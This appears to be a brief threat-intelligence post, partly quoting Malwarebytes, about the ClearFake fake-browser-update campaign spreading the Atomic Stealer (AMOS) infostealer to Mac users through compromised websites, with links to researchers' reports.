In an interesting new development, AMOS is now being delivered to Mac users via a fake browser update chain tracked as ‘ClearFake’
ClearFake is a newer malware campaign that leverages compromised websites to distribute fake browser updates. It was originally discovered by Randy McEoin in August and has since gone through a number of upgrades
https://rmceoin.github.io/malware-analysis/clearfake/
including the use of smart contracts to build its redirect mechanism
https://krebsonsecurity.com/2023/10/the-fake-browser-update-scam-gets-a-makeover/
The Safari template mimics the official Apple website and is available in different languages:
Since Google Chrome is also popular on Macs, there is a template for it which closely resembles the one used for Windows users:
Fake browser updates have been a common theme for Windows users for years, and yet up until now the threat actors didn’t expand onto MacOS in a consistent way.
ClearFake has become one of the main social engineering campaigns recently, Mac users should pay particular attention to it.
---- Malwarebytes
making it one of the most prevalent and dangerous social engineering schemes.
On Nov 17, security researcher Ankit Anubhav observed that ClearFake was distributed to Mac users as well with a corresponding payload:
https://infosec.exchange/@ankit_anubhav/111425827558836814
Atomic Stealer, also known as AMOS, is a popular stealer for Mac OS. Back in September, malwarebytes described how malicious ads were tricking victims into downloading this piece of malware under the disguise of a popular application
https://www.malwarebytes.com/blog/threat-intelligence/2023/09/atomic-macos-stealer-delivered-via-malvertising